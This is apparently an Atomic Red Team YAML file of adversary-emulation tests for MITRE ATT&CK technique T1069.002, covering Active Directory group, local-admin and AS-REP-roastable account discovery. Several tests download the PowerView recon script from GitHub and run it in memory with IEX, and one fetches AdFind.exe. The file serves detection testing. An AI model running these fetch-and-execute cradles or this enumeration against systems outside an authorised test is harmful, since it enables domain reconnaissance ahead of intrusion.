Seth Cahalan
88e46831fc
Co-authored-by: Hare Sudhan <code@0x6c.dev> Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
287 lines
13 KiB
YAML
287 lines
13 KiB
YAML
attack_technique: T1069.002
|
|
display_name: 'Permission Groups Discovery: Domain Groups'
|
|
atomic_tests:
|
|
- name: Basic Permission Groups Discovery Windows (Domain)
|
|
auto_generated_guid: dd66d77d-8998-48c0-8024-df263dc2ce5d
|
|
description: |
|
|
Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
|
|
information will be displayed.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
net localgroup
|
|
net group /domain
|
|
net group "enterprise admins" /domain
|
|
net group "domain admins" /domain
|
|
name: command_prompt
|
|
- name: Permission Groups Discovery PowerShell (Domain)
|
|
auto_generated_guid: 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7
|
|
description: |
|
|
Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
|
|
information will be displayed.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
user:
|
|
description: User to identify what groups a user is a member of
|
|
type: string
|
|
default: $env:USERNAME
|
|
executor:
|
|
command: |
|
|
get-ADPrincipalGroupMembership #{user} | select name
|
|
name: powershell
|
|
- name: Elevated group enumeration using net group (Domain)
|
|
auto_generated_guid: 0afb5163-8181-432e-9405-4322710c0c37
|
|
description: |
|
|
Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This
|
|
test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
net groups "Account Operators" /domain
|
|
net groups "Exchange Organization Management" /domain
|
|
net group "BUILTIN\Backup Operators" /domain
|
|
net group "Domain Admins" /domain
|
|
name: command_prompt
|
|
- name: Find machines where user has local admin access (PowerView)
|
|
auto_generated_guid: a2d71eee-a353-4232-9f86-54f4288dd8c1
|
|
description: |
|
|
Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
|
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose
|
|
name: powershell
|
|
- name: Find local admins on all machines in domain (PowerView)
|
|
auto_generated_guid: a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd
|
|
description: |
|
|
Enumerates members of the local Administrators groups across all machines in the domain. Upon execution, information about each machine will be displayed.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
|
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose
|
|
name: powershell
|
|
- name: Find Local Admins via Group Policy (PowerView)
|
|
auto_generated_guid: 64fdb43b-5259-467a-b000-1b02c00e510a
|
|
description: |
|
|
takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
computer_name:
|
|
description: hostname of the computer to analyze
|
|
type: path
|
|
default: $env:COMPUTERNAME
|
|
executor:
|
|
command: |
|
|
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
|
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose
|
|
name: powershell
|
|
- name: Enumerate Users Not Requiring Pre Auth (ASRepRoast)
|
|
auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b
|
|
description: |
|
|
When successful, accounts that do not require kerberos pre-auth will be returned
|
|
supported_platforms:
|
|
- windows
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
Computer must be domain joined.
|
|
prereq_command: |
|
|
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
Write-Host Joining this computer to a domain must be done manually.
|
|
- description: |
|
|
Requires the Active Directory module for powershell to be installed.
|
|
prereq_command: |
|
|
if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
|
|
executor:
|
|
name: powershell
|
|
elevation_required: false
|
|
command: |
|
|
get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}
|
|
- name: Adfind - Query Active Directory Groups
|
|
auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274
|
|
description: |
|
|
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Groups
|
|
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
optional_args:
|
|
description: Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces.
|
|
type: string
|
|
default:
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
|
|
prereq_command: |
|
|
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
|
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
|
|
executor:
|
|
command: |
|
|
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=group) #{optional_args}
|
|
name: command_prompt
|
|
- name: Enumerate Active Directory Groups with Get-AdGroup
|
|
auto_generated_guid: 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8
|
|
description: |
|
|
The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory.
|
|
Upon successful execution a listing of groups will output with their paths in AD.
|
|
Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
name: powershell
|
|
command: |
|
|
Get-AdGroup -Filter *
|
|
- name: Enumerate Active Directory Groups with ADSISearcher
|
|
auto_generated_guid: 9f4e344b-8434-41b3-85b1-d38f29d148d0
|
|
description: |
|
|
The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory.
|
|
Upon successful execution a listing of groups will output with their paths in AD.
|
|
Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
name: powershell
|
|
elevation_required: false
|
|
command: |
|
|
([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne()
|
|
- name: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
|
|
auto_generated_guid: 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8
|
|
description: |
|
|
When successful, accounts that do not require kerberos pre-auth will be returned.
|
|
Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
|
|
supported_platforms:
|
|
- windows
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
Computer must be domain joined.
|
|
prereq_command: |
|
|
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
Write-Host Joining this computer to a domain must be done manually.
|
|
- description: |
|
|
Requires the Active Directory module for powershell to be installed.
|
|
prereq_command: |
|
|
if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
|
|
executor:
|
|
name: powershell
|
|
elevation_required: false
|
|
command: |
|
|
Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
|
|
- name: Get-DomainGroupMember with PowerView
|
|
auto_generated_guid: 46352f40-f283-4fe5-b56d-d9a71750e145
|
|
description: |
|
|
Utilizing PowerView, run Get-DomainGroupMember to identify domain users. Upon execution, progress and info about groups within the domain being scanned will be displayed.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
|
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"
|
|
name: powershell
|
|
- name: Get-DomainGroup with PowerView
|
|
auto_generated_guid: 5a8a181c-2c8e-478d-a943-549305a01230
|
|
description: |
|
|
Utilizing PowerView, run Get-DomainGroup to identify the domain groups. Upon execution, Groups within the domain will be listed.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
|
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose
|
|
name: powershell
|
|
- name: Active Directory Enumeration with LDIFDE
|
|
auto_generated_guid: 22cf8cb9-adb1-4e8c-80ca-7c723dfc8784
|
|
description: |
|
|
Output information from Active Directory to a specified file. [Ldifde](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc731033(v=ws.11)) is a CLI tool for creating, modifying and deleting directory objects.
|
|
The test is derived from the CISA Report on Voly Typhoon. Reference: https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
output_path:
|
|
description: Path to the file that ldifde will output
|
|
type: path
|
|
default: C:\Windows\temp
|
|
output_file:
|
|
description: The filename to be created by ldifde
|
|
type: string
|
|
default: atomic_ldifde.txt
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
PowerShell ActiveDirectory Module must be installed
|
|
prereq_command: |
|
|
Try {
|
|
Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
|
|
exit 0
|
|
}
|
|
Catch {
|
|
exit 1
|
|
}
|
|
get_prereq_command: |
|
|
if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
|
|
Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
|
|
} else {
|
|
Install-WindowsFeature RSAT-AD-PowerShell
|
|
}
|
|
executor:
|
|
elevation_required: true
|
|
command: |
|
|
ldifde.exe -f #{output_path}\#{output_file} -p subtree
|
|
cleanup_command: |
|
|
del #{output_path}\#{output_file}
|
|
name: command_prompt
|
|
- name: Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS
|
|
auto_generated_guid: d58d749c-4450-4975-a9e9-8b1d562755c2
|
|
description: |
|
|
Output information from LDAPSearch. LDAP Password is the admin-user password on Active Directory
|
|
supported_platforms:
|
|
- linux
|
|
input_arguments:
|
|
domain:
|
|
description: The domain to be tested
|
|
type: string
|
|
default: example
|
|
top_level_domain:
|
|
description: The top level domain (.com, .test, .remote, etc... following domain, minus the .)
|
|
type: string
|
|
default: com
|
|
user:
|
|
description: username@domain of a user
|
|
type: string
|
|
default: user@example.com
|
|
password:
|
|
description: password of the user referenced inside user
|
|
type: string
|
|
default: s3CurePssw0rD!
|
|
dependency_executor_name: sh
|
|
dependencies:
|
|
- description: |
|
|
Packages sssd-ad sssd-tools realmd adcli installed and realm available, ldapsearch
|
|
prereq_command: |
|
|
which ldapsearch
|
|
get_prereq_command: |
|
|
echo missing ldapsearch command; exit 1
|
|
executor:
|
|
elevation_required: false
|
|
command: |
|
|
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" "(objectClass=group)" -s sub -a always -z 1000 dn
|
|
name: sh
|